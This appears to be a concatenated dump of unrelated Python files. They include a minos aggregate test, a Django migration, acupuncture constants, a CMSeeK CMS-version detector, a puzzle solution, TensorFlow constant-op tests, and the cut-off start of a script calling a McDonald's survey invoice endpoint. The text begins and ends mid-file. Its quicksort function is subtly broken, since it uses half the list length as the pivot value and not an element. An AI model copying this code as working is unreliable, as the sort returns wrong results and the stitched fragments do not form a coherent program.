os.chmod(file, os.stat(file).st_mode | stat.S_IEXEC) |
py | b40b46a90689111f30f3e8a49c4567bc46b82266 | import unittest
from uuid import (
UUID,
)
from minos.aggregate import (
Aggregate,
)
from minos.common import (
NotProvidedException,
)
from tests.utils import (
CONFIG_FILE_PATH,
AggregateTestCase,
Order,
OrderAggregate,
)
class TestAggregate(AggregateTestCase):
async def test_root(self):
async with OrderAggregate.from_config(CONFIG_FILE_PATH) as aggregate:
self.assertEqual(Order, aggregate.root)
def test_root_raises(self):
with self.assertRaises(TypeError):
Aggregate.from_config(CONFIG_FILE_PATH)
async def test_from_config(self):
async with OrderAggregate.from_config(CONFIG_FILE_PATH) as aggregate:
self.assertTrue(self.transaction_repository, aggregate.transaction_repository)
self.assertTrue(self.event_repository, aggregate.event_repository)
self.assertTrue(self.snapshot_repository, aggregate.snapshot_repository)
def test_from_config_raises(self):
with self.assertRaises(NotProvidedException):
OrderAggregate.from_config(CONFIG_FILE_PATH, transaction_repository=None)
with self.assertRaises(NotProvidedException):
OrderAggregate.from_config(CONFIG_FILE_PATH, event_repository=None)
with self.assertRaises(NotProvidedException):
OrderAggregate.from_config(CONFIG_FILE_PATH, snapshot_repository=None)
async def test_call(self):
async with OrderAggregate.from_config(CONFIG_FILE_PATH) as aggregate:
uuid = await aggregate.create_order()
self.assertIsInstance(uuid, UUID)
if __name__ == "__main__":
unittest.main()
|
py | b40b472912d4bb3c82128e0eeef1fd7244b90be2 | # Generated by Django 3.0.7 on 2020-07-16 09:15
import annoying.fields
from django.conf import settings
from django.db import migrations
import django.db.models.deletion
class Migration(migrations.Migration):
dependencies = [
migrations.swappable_dependency(settings.AUTH_USER_MODEL),
("api", "0036_auto_20200716_1021"),
]
operations = [
migrations.AlterField(
model_name="elo",
name="player",
field=annoying.fields.AutoOneToOneField(
null=True,
on_delete=django.db.models.deletion.CASCADE,
related_name="elo",
to=settings.AUTH_USER_MODEL,
),
),
]
|
py | b40b473733680a5ecd2271227276ef3a269594aa | def quicksort(self, nums):
if len(nums) <= 1:
return nums
pivot = len(nums) / 2
lt = [v for v in nums if v < pivot]
eq = [v for v in nums if v == pivot]
gt = [v for v in nums if v > pivot]
return self.quicksort(lt) + eq + self.quicksort(gt)
|
py | b40b48dcf044ee0e781891bc7d373608eb3e502c | #!/usr/bin/python
#coding=utf-8
'''
@author: sheng
@license:
'''
SPELL=u'yǒngquán'
CN=u'涌泉'
NAME=u'yongquan32'
CHANNEL='kidney'
CHANNEL_FULLNAME='KidneyChannelofFoot-Shaoyin'
SEQ='KI1'
if __name__ == '__main__':
pass
|
py | b40b4992146732e720b6992b287583b9adb32e3b | #!/usr/bin/python3
# -*- coding: utf-8 -*-
# This is a part of CMSeeK, check the LICENSE file for more information
# Copyright (c) 2018 - 2020 Tuhinshubhra
# BrowserCMS version detection
# Rev 1
import cmseekdb.basic as cmseek
import re
def start(ga_content):
ga_content = ga_content.lower()
regex = re.findall(r'browsercms (.*)', ga_content)
if regex != []:
version = regex[0]
cmseek.success('BrowserCMS version ' + cmseek.bold + cmseek.fgreen + version + cmseek.cln + ' detected')
return version
else:
cmseek.error('Version detection failed!')
return '0'
|
py | b40b4a68c3823373b00ddbd574147b4424abee6c | def get_proba(w, h, W, H):
proba = probas[w][h]
if proba is not None:
return proba
elif w == W - 1:
proba = get_proba(w, h + 1, W, H)
probas[w][h] = proba
return proba
elif h == H - 1:
proba = get_proba(w + 1, h, W, H)
probas[w][h] = proba
return proba
else:
proba = 0.5 * get_proba(w, h + 1, W, H) + \
0.5 * get_proba(w + 1, h, W, H)
probas[w][h] = proba
return proba
T = int(input())
for t in range(T):
[W, H, L, U, R, D] = list(map(int, input().split(' ')))
global probas
probas = [[None] * H for _ in range(W)]
for i in range(W):
for j in range(H):
if i >= R or j >= D:
probas[i][j] = 1
elif i >= L - 1 and j >= U - 1:
probas[i][j] = 0
print("Case #{}: {}".format(t + 1, get_proba(0, 0, W, H)))
|
py | b40b4b429a9c0ac7522b21daff3ec8c768f3bc33 | # Copyright 2015 The TensorFlow Authors. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# ==============================================================================
"""Tests for ConstantOp."""
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
import numpy as np
from tensorflow.python.framework import constant_op
from tensorflow.python.framework import dtypes as dtypes_lib
from tensorflow.python.framework import errors_impl
from tensorflow.python.framework import ops
from tensorflow.python.framework import tensor_shape
from tensorflow.python.ops import array_ops
from tensorflow.python.ops import gradient_checker
from tensorflow.python.ops import math_ops
from tensorflow.python.platform import test
from tensorflow.python.util import compat
class ConstantTest(test.TestCase):
def _testCpu(self, x):
np_ans = np.array(x)
with self.test_session(use_gpu=False):
tf_ans = ops.convert_to_tensor(x).eval()
if np_ans.dtype in [np.float32, np.float64, np.complex64, np.complex128]:
self.assertAllClose(np_ans, tf_ans)
else:
self.assertAllEqual(np_ans, tf_ans)
def _testGpu(self, x):
np_ans = np.array(x)
with self.test_session(use_gpu=True):
tf_ans = ops.convert_to_tensor(x).eval()
if np_ans.dtype in [np.float32, np.float64, np.complex64, np.complex128]:
self.assertAllClose(np_ans, tf_ans)
else:
self.assertAllEqual(np_ans, tf_ans)
def _testAll(self, x):
self._testCpu(x)
self._testGpu(x)
def testFloat(self):
self._testAll(np.arange(-15, 15).reshape([2, 3, 5]).astype(np.float32))
self._testAll(
np.random.normal(size=30).reshape([2, 3, 5]).astype(np.float32))
self._testAll(np.empty((2, 0, 5)).astype(np.float32))
def testDouble(self):
self._testAll(np.arange(-15, 15).reshape([2, 3, 5]).astype(np.float64))
self._testAll(
np.random.normal(size=30).reshape([2, 3, 5]).astype(np.float64))
self._testAll(np.empty((2, 0, 5)).astype(np.float64))
def testInt32(self):
self._testAll(np.arange(-15, 15).reshape([2, 3, 5]).astype(np.int32))
self._testAll((100 * np.random.normal(size=30)).reshape([2, 3, 5]).astype(
np.int32))
self._testAll(np.empty((2, 0, 5)).astype(np.int32))
def testInt64(self):
self._testAll(np.arange(-15, 15).reshape([2, 3, 5]).astype(np.int64))
self._testAll((100 * np.random.normal(size=30)).reshape([2, 3, 5]).astype(
np.int64))
self._testAll(np.empty((2, 0, 5)).astype(np.int64))
def testComplex64(self):
self._testAll(
np.complex(1, 2) *
np.arange(-15, 15).reshape([2, 3, 5]).astype(np.complex64))
self._testAll(
np.complex(1, 2) *
np.random.normal(size=30).reshape([2, 3, 5]).astype(np.complex64))
self._testAll(np.empty((2, 0, 5)).astype(np.complex64))
def testComplex128(self):
self._testAll(
np.complex(1, 2) *
np.arange(-15, 15).reshape([2, 3, 5]).astype(np.complex128))
self._testAll(
np.complex(1, 2) *
np.random.normal(size=30).reshape([2, 3, 5]).astype(np.complex128))
self._testAll(np.empty((2, 0, 5)).astype(np.complex128))
def testString(self):
self._testCpu(
np.array([compat.as_bytes(str(x)) for x in np.arange(-15, 15)]).reshape(
[2, 3, 5]))
self._testCpu(np.empty((2, 0, 5)).astype(np.str_))
def testStringWithNulls(self):
with self.test_session():
val = ops.convert_to_tensor(b"\0\0\0\0").eval()
self.assertEqual(len(val), 4)
self.assertEqual(val, b"\0\0\0\0")
with self.test_session():
val = ops.convert_to_tensor(b"xx\0xx").eval()
self.assertEqual(len(val), 5)
self.assertAllEqual(val, b"xx\0xx")
nested = [[b"\0\0\0\0", b"xx\0xx"], [b"\0_\0_\0_\0", b"\0"]]
with self.test_session():
val = ops.convert_to_tensor(nested).eval()
# NOTE(mrry): Do not use assertAllEqual, because it converts nested to a
# numpy array, which loses the null terminators.
self.assertEqual(val.tolist(), nested)
def testExplicitShapeNumPy(self):
with ops.Graph().as_default():
c = constant_op.constant(
np.arange(-15, 15).reshape([2, 3, 5]).astype(np.float32),
shape=[2, 3, 5])
self.assertEqual(c.get_shape(), [2, 3, 5])
def testImplicitShapeNumPy(self):
with ops.Graph().as_default():
c = constant_op.constant(
np.arange(-15, 15).reshape([2, 3, 5]).astype(np.float32))
self.assertEqual(c.get_shape(), [2, 3, 5])
def testExplicitShapeList(self):
with ops.Graph().as_default():
c = constant_op.constant([1, 2, 3, 4, 5, 6, 7], shape=[7])
self.assertEqual(c.get_shape(), [7])
def testImplicitShapeList(self):
with ops.Graph().as_default():
c = constant_op.constant([1, 2, 3, 4, 5, 6, 7])
self.assertEqual(c.get_shape(), [7])
def testExplicitShapeNumber(self):
with ops.Graph().as_default():
c = constant_op.constant(1, shape=[1])
self.assertEqual(c.get_shape(), [1])
def testImplicitShapeNumber(self):
with ops.Graph().as_default():
c = constant_op.constant(1)
self.assertEqual(c.get_shape(), [])
def testShapeInconsistent(self):
with ops.Graph().as_default():
c = constant_op.constant([1, 2, 3, 4, 5, 6, 7], shape=[10])
self.assertEqual(c.get_shape(), [10])
# pylint: disable=g-long-lambda
def testShapeWrong(self):
with ops.Graph().as_default():
with self.assertRaisesWithPredicateMatch(
ValueError,
lambda e: ("Too many elements provided. Needed at most 5, "
"but received 7" == str(e))):
constant_op.constant([1, 2, 3, 4, 5, 6, 7], shape=[5])
# pylint: enable=g-long-lambda
def testTooLargeConstant(self):
with ops.Graph().as_default():
large_array = np.zeros((512, 1024, 1024), dtype=np.float32)
with self.assertRaisesRegexp(
ValueError,
"Cannot create a tensor proto whose content is larger than 2GB."):
c = constant_op.constant(large_array)
def testTooLargeGraph(self):
with ops.Graph().as_default() as g:
large_array = np.zeros((256, 1024, 1024), dtype=np.float32)
c = constant_op.constant(large_array)
d = constant_op.constant(large_array)
with self.assertRaisesRegexp(ValueError,
"GraphDef cannot be larger than 2GB."):
g.as_graph_def()
def testSparseValuesRaiseErrors(self):
with self.assertRaisesRegexp(ValueError,
"setting an array element with a sequence"):
c = constant_op.constant([[1, 2], [3]], dtype=dtypes_lib.int32)
with self.assertRaisesRegexp(ValueError, "must be a dense"):
c = constant_op.constant([[1, 2], [3]])
with self.assertRaisesRegexp(ValueError, "must be a dense"):
c = constant_op.constant([[1, 2], [3], [4, 5]])
class AsTensorTest(test.TestCase):
def testAsTensorForTensorInput(self):
with ops.Graph().as_default():
t = constant_op.constant(10.0)
x = ops.convert_to_tensor(t)
self.assertIs(t, x)
def testAsTensorForNonTensorInput(self):
with ops.Graph().as_default():
x = ops.convert_to_tensor(10.0)
self.assertTrue(isinstance(x, ops.Tensor))
def testAsTensorForShapeInput(self):
with self.test_session():
x = ops.convert_to_tensor(tensor_shape.TensorShape([]))
self.assertEqual(dtypes_lib.int32, x.dtype)
self.assertAllEqual([], x.eval())
x = ops.convert_to_tensor(tensor_shape.TensorShape([1, 2, 3]))
self.assertEqual(dtypes_lib.int32, x.dtype)
self.assertAllEqual([1, 2, 3], x.eval())
x = ops.convert_to_tensor(
tensor_shape.TensorShape([1, 2, 3]), dtype=dtypes_lib.int64)
self.assertEqual(dtypes_lib.int64, x.dtype)
self.assertAllEqual([1, 2, 3], x.eval())
x = array_ops.reshape(
array_ops.zeros([6]), tensor_shape.TensorShape([2, 3]))
self.assertAllEqual([[0.0, 0.0, 0.0], [0.0, 0.0, 0.0]], x.eval())
with self.assertRaisesRegexp(ValueError, "partially known"):
ops.convert_to_tensor(tensor_shape.TensorShape(None))
with self.assertRaisesRegexp(ValueError, "partially known"):
ops.convert_to_tensor(tensor_shape.TensorShape([1, None, 64]))
with self.assertRaises(TypeError):
ops.convert_to_tensor(
tensor_shape.TensorShape([1, 2, 3]), dtype=dtypes_lib.float32)
def testAsTensorForDimensionInput(self):
with self.test_session():
x = ops.convert_to_tensor(tensor_shape.TensorShape([1, 2, 3])[1])
self.assertEqual(dtypes_lib.int32, x.dtype)
self.assertAllEqual(2, x.eval())
x = ops.convert_to_tensor(
tensor_shape.TensorShape([1, 2, 3])[1], dtype=dtypes_lib.int64)
self.assertEqual(dtypes_lib.int64, x.dtype)
self.assertAllEqual(2, x.eval())
with self.assertRaisesRegexp(ValueError, "unknown Dimension"):
ops.convert_to_tensor(tensor_shape.TensorShape(None)[1])
with self.assertRaisesRegexp(ValueError, "unknown Dimension"):
ops.convert_to_tensor(tensor_shape.TensorShape([1, None, 64])[1])
with self.assertRaises(TypeError):
ops.convert_to_tensor(
tensor_shape.TensorShape([1, 2, 3])[1], dtype=dtypes_lib.float32)
class IdentityOpTest(test.TestCase):
def testIdTensor(self):
with ops.Graph().as_default():
x = constant_op.constant(2.0, shape=[6], name="input")
id_op = array_ops.identity(x, name="id")
self.assertTrue(isinstance(id_op.op.inputs[0], ops.Tensor))
self.assertProtoEquals("name: 'id' op: 'Identity' input: 'input' "
"attr { key: 'T' value { type: DT_FLOAT } }",
id_op.op.node_def)
class ZerosTest(test.TestCase):
def _Zeros(self, shape):
with self.test_session():
ret = array_ops.zeros(shape)
self.assertEqual(shape, ret.get_shape())
return ret.eval()
def testConst(self):
self.assertTrue(
np.array_equal(self._Zeros([2, 3]), np.array([[0] * 3] * 2)))
def testScalar(self):
self.assertEqual(0, self._Zeros([]))
self.assertEqual(0, self._Zeros(()))
with self.test_session():
scalar = array_ops.zeros(constant_op.constant([], dtype=dtypes_lib.int32))
self.assertEqual(0, scalar.eval())
def testDynamicSizes(self):
np_ans = np.array([[0] * 3] * 2)
with self.test_session():
# Creates a tensor of 2 x 3.
d = array_ops.fill([2, 3], 12., name="fill")
# Constructs a tensor of zeros of the same dimensions as "d".
z = array_ops.zeros(array_ops.shape(d))
out = z.eval()
self.assertAllEqual(np_ans, out)
self.assertShapeEqual(np_ans, d)
self.assertShapeEqual(np_ans, z)
def testDtype(self):
with self.test_session():
d = array_ops.fill([2, 3], 12., name="fill")
self.assertEqual(d.get_shape(), [2, 3])
# Test default type for both constant size and dynamic size
z = array_ops.zeros([2, 3])
self.assertEqual(z.dtype, dtypes_lib.float32)
self.assertEqual([2, 3], z.get_shape())
self.assertAllEqual(z.eval(), np.zeros([2, 3]))
z = array_ops.zeros(array_ops.shape(d))
self.assertEqual(z.dtype, dtypes_lib.float32)
self.assertEqual([2, 3], z.get_shape())
self.assertAllEqual(z.eval(), np.zeros([2, 3]))
# Test explicit type control
for dtype in [
dtypes_lib.float32, dtypes_lib.float64, dtypes_lib.int32,
dtypes_lib.uint8, dtypes_lib.int16, dtypes_lib.int8,
dtypes_lib.complex64, dtypes_lib.complex128, dtypes_lib.int64,
dtypes_lib.bool
]:
z = array_ops.zeros([2, 3], dtype=dtype)
self.assertEqual(z.dtype, dtype)
self.assertEqual([2, 3], z.get_shape())
self.assertAllEqual(z.eval(), np.zeros([2, 3]))
z = array_ops.zeros(array_ops.shape(d), dtype=dtype)
self.assertEqual(z.dtype, dtype)
self.assertEqual([2, 3], z.get_shape())
self.assertAllEqual(z.eval(), np.zeros([2, 3]))
class ZerosLikeTest(test.TestCase):
def _compareZeros(self, dtype, use_gpu):
with self.test_session(use_gpu=use_gpu):
# Creates a tensor of non-zero values with shape 2 x 3.
numpy_dtype = dtype.as_numpy_dtype
d = constant_op.constant(np.ones((2, 3), dtype=numpy_dtype), dtype=dtype)
# Constructs a tensor of zeros of the same dimensions and type as "d".
z_var = array_ops.zeros_like(d)
# Test that the type is correct
self.assertEqual(z_var.dtype, dtype)
z_value = z_var.eval()
# Test that the value is correct
self.assertTrue(np.array_equal(z_value, np.array([[0] * 3] * 2)))
self.assertEqual([2, 3], z_var.get_shape())
def testZerosLikeCPU(self):
for dtype in [
dtypes_lib.float32, dtypes_lib.float64, dtypes_lib.int32,
dtypes_lib.uint8, dtypes_lib.int16, dtypes_lib.int8,
dtypes_lib.complex64, dtypes_lib.complex128, dtypes_lib.int64
]:
self._compareZeros(dtype, False)
def testZerosLikeGPU(self):
for dtype in [
dtypes_lib.float32, dtypes_lib.float64, dtypes_lib.int32,
dtypes_lib.bool, dtypes_lib.int64
]:
self._compareZeros(dtype, True)
def testZerosLikePartialShape(self):
d = array_ops.placeholder(dtypes_lib.float32, shape=[None, 4, None])
z = array_ops.zeros_like(d)
self.assertEqual(d.get_shape().as_list(), z.get_shape().as_list())
def testZerosLikeDtype(self):
# Make sure zeros_like works even for dtypes that cannot be cast between
with self.test_session():
shape = (3, 5)
dtypes = np.float32, np.complex64
for in_type in dtypes:
x = np.arange(15).astype(in_type).reshape(*shape)
for out_type in dtypes:
y = array_ops.zeros_like(x, dtype=out_type).eval()
self.assertEqual(y.dtype, out_type)
self.assertEqual(y.shape, shape)
self.assertAllEqual(y, np.zeros(shape, dtype=out_type))
class OnesTest(test.TestCase):
def _Ones(self, shape):
with self.test_session():
ret = array_ops.ones(shape)
self.assertEqual(shape, ret.get_shape())
return ret.eval()
def testConst(self):
self.assertTrue(np.array_equal(self._Ones([2, 3]), np.array([[1] * 3] * 2)))
def testScalar(self):
self.assertEqual(1, self._Ones([]))
self.assertEqual(1, self._Ones(()))
with self.test_session():
scalar = array_ops.ones(constant_op.constant([], dtype=dtypes_lib.int32))
self.assertEqual(1, scalar.eval())
def testDynamicSizes(self):
np_ans = np.array([[1] * 3] * 2)
with self.test_session():
# Creates a tensor of 2 x 3.
d = array_ops.fill([2, 3], 12., name="fill")
# Constructs a tensor of ones of the same dimensions as "d".
z = array_ops.ones(array_ops.shape(d))
out = z.eval()
self.assertAllEqual(np_ans, out)
self.assertShapeEqual(np_ans, d)
self.assertShapeEqual(np_ans, z)
def testAutoPack(self):
with self.test_session():
h = array_ops.placeholder(dtypes_lib.int32, shape=[])
w = array_ops.placeholder(dtypes_lib.int32, shape=[])
z = array_ops.ones([h, w])
out = z.eval(feed_dict={h: 4, w: 16})
self.assertAllEqual(out, np.array([[1] * 16] * 4))
def testDtype(self):
with self.test_session():
d = array_ops.fill([2, 3], 12., name="fill")
self.assertEqual(d.get_shape(), [2, 3])
# Test default type for both constant size and dynamic size
z = array_ops.ones([2, 3])
self.assertEqual(z.dtype, dtypes_lib.float32)
self.assertEqual([2, 3], z.get_shape())
self.assertAllEqual(z.eval(), np.ones([2, 3]))
z = array_ops.ones(array_ops.shape(d))
self.assertEqual(z.dtype, dtypes_lib.float32)
self.assertEqual([2, 3], z.get_shape())
self.assertAllEqual(z.eval(), np.ones([2, 3]))
# Test explicit type control
for dtype in (dtypes_lib.float32, dtypes_lib.float64, dtypes_lib.int32,
dtypes_lib.uint8, dtypes_lib.int16, dtypes_lib.int8,
dtypes_lib.complex64, dtypes_lib.complex128,
dtypes_lib.int64, dtypes_lib.bool):
z = array_ops.ones([2, 3], dtype=dtype)
self.assertEqual(z.dtype, dtype)
self.assertEqual([2, 3], z.get_shape())
self.assertAllEqual(z.eval(), np.ones([2, 3]))
z = array_ops.ones(array_ops.shape(d), dtype=dtype)
self.assertEqual(z.dtype, dtype)
self.assertEqual([2, 3], z.get_shape())
self.assertAllEqual(z.eval(), np.ones([2, 3]))
class OnesLikeTest(test.TestCase):
def testOnesLike(self):
for dtype in [
dtypes_lib.float32, dtypes_lib.float64, dtypes_lib.int32,
dtypes_lib.uint8, dtypes_lib.int16, dtypes_lib.int8,
dtypes_lib.complex64, dtypes_lib.complex128, dtypes_lib.int64
]:
numpy_dtype = dtype.as_numpy_dtype
with self.test_session():
# Creates a tensor of non-zero values with shape 2 x 3.
d = constant_op.constant(
np.ones(
(2, 3), dtype=numpy_dtype), dtype=dtype)
# Constructs a tensor of zeros of the same dimensions and type as "d".
z_var = array_ops.ones_like(d)
# Test that the type is correct
self.assertEqual(z_var.dtype, dtype)
z_value = z_var.eval()
# Test that the value is correct
self.assertTrue(np.array_equal(z_value, np.array([[1] * 3] * 2)))
self.assertEqual([2, 3], z_var.get_shape())
def testOnesLikePartialShape(self):
d = array_ops.placeholder(dtypes_lib.float32, shape=[None, 4, None])
z = array_ops.ones_like(d)
self.assertEqual(d.get_shape().as_list(), z.get_shape().as_list())
class FillTest(test.TestCase):
def _compare(self, dims, val, np_ans, use_gpu):
with self.test_session(use_gpu=use_gpu):
tf_ans = array_ops.fill(dims, val, name="fill")
out = tf_ans.eval()
self.assertAllClose(np_ans, out)
# Fill does not set the shape.
# self.assertShapeEqual(np_ans, tf_ans)
def _compareAll(self, dims, val, np_ans):
self._compare(dims, val, np_ans, False)
self._compare(dims, val, np_ans, True)
def testFillFloat(self):
np_ans = np.array([[3.1415] * 3] * 2).astype(np.float32)
self._compareAll([2, 3], np_ans[0][0], np_ans)
def testFillDouble(self):
np_ans = np.array([[3.1415] * 3] * 2).astype(np.float64)
self._compareAll([2, 3], np_ans[0][0], np_ans)
def testFillInt32(self):
np_ans = np.array([[42] * 3] * 2).astype(np.int32)
self._compareAll([2, 3], np_ans[0][0], np_ans)
def testFillInt64(self):
np_ans = np.array([[-42] * 3] * 2).astype(np.int64)
self._compareAll([2, 3], np_ans[0][0], np_ans)
def testFillComplex64(self):
np_ans = np.array([[0.15] * 3] * 2).astype(np.complex64)
self._compare([2, 3], np_ans[0][0], np_ans, use_gpu=False)
def testFillComplex128(self):
np_ans = np.array([[0.15] * 3] * 2).astype(np.complex128)
self._compare([2, 3], np_ans[0][0], np_ans, use_gpu=False)
def testFillString(self):
np_ans = np.array([[b"yolo"] * 3] * 2)
with self.test_session(use_gpu=False):
tf_ans = array_ops.fill([2, 3], np_ans[0][0], name="fill").eval()
self.assertAllEqual(np_ans, tf_ans)
def testFillNegative(self):
with self.test_session():
for shape in (-1,), (2, -1), (-1, 2), (-2), (-3):
with self.assertRaises(ValueError):
array_ops.fill(shape, 7)
# Using a placeholder so this won't be caught in static analysis.
dims = array_ops.placeholder(dtypes_lib.int32)
fill_t = array_ops.fill(dims, 3.0)
for shape in (-1,), (2, -1), (-1, 2), (-2), (-3):
with self.assertRaises(errors_impl.InvalidArgumentError):
fill_t.eval({dims: shape})
def testShapeFunctionEdgeCases(self):
# Non-vector dimensions.
with self.assertRaises(ValueError):
array_ops.fill([[0, 1], [2, 3]], 1.0)
# Non-scalar value.
with self.assertRaises(ValueError):
array_ops.fill([3, 2], [1.0, 2.0])
# Partial dimension information.
f = array_ops.fill(array_ops.placeholder(dtypes_lib.int32, shape=(4,)), 3.0)
self.assertEqual([None, None, None, None], f.get_shape().as_list())
f = array_ops.fill(
[array_ops.placeholder(
dtypes_lib.int32, shape=()), 17], 1.0)
self.assertEqual([None, 17], f.get_shape().as_list())
def testGradient(self):
with self.test_session():
in_v = constant_op.constant(5.0)
out_shape = [3, 2]
out_filled = array_ops.fill(out_shape, in_v)
err = gradient_checker.compute_gradient_error(in_v, [], out_filled,
out_shape)
self.assertLess(err, 1e-3)
class PlaceholderTest(test.TestCase):
def testDtype(self):
with self.test_session():
p = array_ops.placeholder(dtypes_lib.float32, name="p")
p_identity = array_ops.identity(p)
feed_array = np.random.rand(10, 10)
self.assertAllClose(
p_identity.eval(feed_dict={p: feed_array}), feed_array)
with self.assertRaisesOpError(
"must feed a value for placeholder tensor 'p' with dtype float"):
p_identity.eval()
def testShape(self):
with self.test_session():
p = array_ops.placeholder(dtypes_lib.float32, shape=(10, 10), name="p")
p_identity = array_ops.identity(p)
feed_array = np.random.rand(10, 10)
self.assertAllClose(
p_identity.eval(feed_dict={p: feed_array}), feed_array)
with self.assertRaisesOpError(
"must feed a value for placeholder tensor 'p' with dtype float and "
r"shape \[10,10\]"):
p_identity.eval()
with self.assertRaisesWithPredicateMatch(
ValueError, lambda e: "Cannot feed value of shape" in str(e)):
p_identity.eval(feed_dict={p: feed_array[:5, :5]})
def testPartialShape(self):
with self.test_session():
p = array_ops.placeholder(dtypes_lib.float32, shape=[None, 3], name="p")
p_identity = array_ops.identity(p)
feed_array = np.random.rand(10, 3)
self.assertAllClose(
p_identity.eval(feed_dict={p: feed_array}), feed_array)
with self.assertRaisesWithPredicateMatch(
ValueError, lambda e: "Cannot feed value of shape" in str(e)):
p_identity.eval(feed_dict={p: feed_array[:5, :2]})
def testControlDependency(self):
with self.test_session():
p = array_ops.placeholder(dtypes_lib.int32, shape=[], name="p")
with ops.control_dependencies([p]):
c = constant_op.constant(5, dtypes_lib.int32)
d = math_ops.mul(p, c)
self.assertEqual(10, d.eval(feed_dict={p: 2}))
def testBadShape(self):
with self.assertRaises(ValueError):
array_ops.placeholder(dtypes_lib.float32, shape=(-1, 10))
def testTensorStr(self):
a = array_ops.placeholder(dtypes_lib.float32, name="a")
self.assertEqual("<tf.Tensor 'a:0' shape=<unknown> dtype=float32>", repr(a))
b = array_ops.placeholder(dtypes_lib.int32, shape=(32, 40), name="b")
self.assertEqual("<tf.Tensor 'b:0' shape=(32, 40) dtype=int32>", repr(b))
c = array_ops.placeholder(dtypes_lib.qint32, shape=(32, None, 2), name="c")
self.assertEqual("<tf.Tensor 'c:0' shape=(32, ?, 2) dtype=qint32>", repr(c))
class PlaceholderV2Test(test.TestCase):
def testDtype(self):
with self.test_session():
p = array_ops.placeholder_v2(dtypes_lib.float32, shape=None, name="p")
p_identity = array_ops.identity(p)
feed_array = np.random.rand(10, 10)
self.assertAllClose(
p_identity.eval(feed_dict={p: feed_array}), feed_array)
with self.assertRaisesOpError(
"must feed a value for placeholder tensor 'p' with dtype float"):
p_identity.eval()
def testShape(self):
with self.test_session():
p = array_ops.placeholder_v2(dtypes_lib.float32, shape=(10, 10), name="p")
p_identity = array_ops.identity(p)
feed_array = np.random.rand(10, 10)
self.assertAllClose(
p_identity.eval(feed_dict={p: feed_array}), feed_array)
with self.assertRaisesOpError(
"must feed a value for placeholder tensor 'p' with dtype float and "
r"shape \[10,10\]"):
p_identity.eval()
with self.assertRaisesWithPredicateMatch(
ValueError, lambda e: "Cannot feed value of shape" in str(e)):
p_identity.eval(feed_dict={p: feed_array[:5, :5]})
def testUnknownShape(self):
with self.test_session():
p = array_ops.placeholder_v2(dtypes_lib.float32, shape=None, name="p")
p_identity = array_ops.identity(p)
# can feed anything
feed_array = np.random.rand(10, 3)
self.assertAllClose(
p_identity.eval(feed_dict={p: feed_array}), feed_array)
feed_array = np.random.rand(4, 2, 5)
self.assertAllClose(
p_identity.eval(feed_dict={p: feed_array}), feed_array)
def testScalarShape(self):
with self.test_session():
p = array_ops.placeholder_v2(dtypes_lib.float32, shape=[], name="p")
p_identity = array_ops.identity(p)
self.assertAllClose(p_identity.eval(feed_dict={p: 5}), 5)
def testPartialShape(self):
with self.test_session():
p = array_ops.placeholder_v2(
dtypes_lib.float32, shape=[None, 3], name="p")
p_identity = array_ops.identity(p)
feed_array = np.random.rand(10, 3)
self.assertAllClose(
p_identity.eval(feed_dict={p: feed_array}), feed_array)
with self.assertRaisesWithPredicateMatch(
ValueError, lambda e: "Cannot feed value of shape" in str(e)):
p_identity.eval(feed_dict={p: feed_array[:5, :2]})
def testControlDependency(self):
with self.test_session():
p = array_ops.placeholder_v2(dtypes_lib.int32, shape=[], name="p")
with ops.control_dependencies([p]):
c = constant_op.constant(5, dtypes_lib.int32)
d = math_ops.mul(p, c)
val = np.array(2).astype(np.int)
self.assertEqual(10, d.eval(feed_dict={p: val}))
def testBadShape(self):
with self.assertRaises(ValueError):
array_ops.placeholder_v2(dtypes_lib.float32, shape=(-1, 10))
def testTensorStr(self):
a = array_ops.placeholder_v2(dtypes_lib.float32, shape=None, name="a")
self.assertEqual("<tf.Tensor 'a:0' shape=<unknown> dtype=float32>", repr(a))
b = array_ops.placeholder_v2(dtypes_lib.int32, shape=(32, 40), name="b")
self.assertEqual("<tf.Tensor 'b:0' shape=(32, 40) dtype=int32>", repr(b))
c = array_ops.placeholder_v2(
dtypes_lib.qint32, shape=(32, None, 2), name="c")
self.assertEqual("<tf.Tensor 'c:0' shape=(32, ?, 2) dtype=qint32>", repr(c))
class PlaceholderWithDefaultTest(test.TestCase):
def testFullShape(self):
with self.test_session():
p = array_ops.placeholder_with_default([[2, 2], [2, 2]], shape=[2, 2])
a = array_ops.identity(p)
self.assertAllEqual([[2, 2], [2, 2]], a.eval())
self.assertAllEqual(
[[3, 3], [3, 3]], a.eval(feed_dict={p: [[3, 3], [3, 3]]}))
with self.assertRaises(ValueError):
a.eval(feed_dict={p: [[6, 6, 6], [6, 6, 6]]})
def testPartialShape(self):
with self.test_session():
p = array_ops.placeholder_with_default([1, 2, 3], shape=[None])
a = array_ops.identity(p)
self.assertAllEqual([1, 2, 3], a.eval())
self.assertAllEqual([3, 37], a.eval(feed_dict={p: [3, 37]}))
with self.assertRaises(ValueError):
a.eval(feed_dict={p: [[2, 2], [2, 2]]})
def testNoShape(self):
with self.test_session():
p = array_ops.placeholder_with_default([17], shape=None)
a = array_ops.identity(p)
self.assertAllEqual([17], a.eval())
self.assertAllEqual([3, 37], a.eval(feed_dict={p: [3, 37]}))
self.assertAllEqual(
[[3, 3], [3, 3]], a.eval(feed_dict={p: [[3, 3], [3, 3]]}))
if __name__ == "__main__":
test.main()
|
py | b40b4b826059c578b56a45c63e6c4079852e4fb5 | # -*- coding: utf-8 -*-
# Copyright 2019 Giacomo Ferretti
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import json
import logging
import os
import random
from datetime import datetime, timedelta
import requests
from ffapi import utils
_logger = logging.getLogger(__name__)
check_invoice = 'https://mcdonalds.fast-insight.com/voc/bs/api/v3/it/checkInvoice'
# Load locations
_locations_filename = 'locations.json'
if os.path.isfile(os.path.join(os.path.dirname(__file__), _locations_filename)):
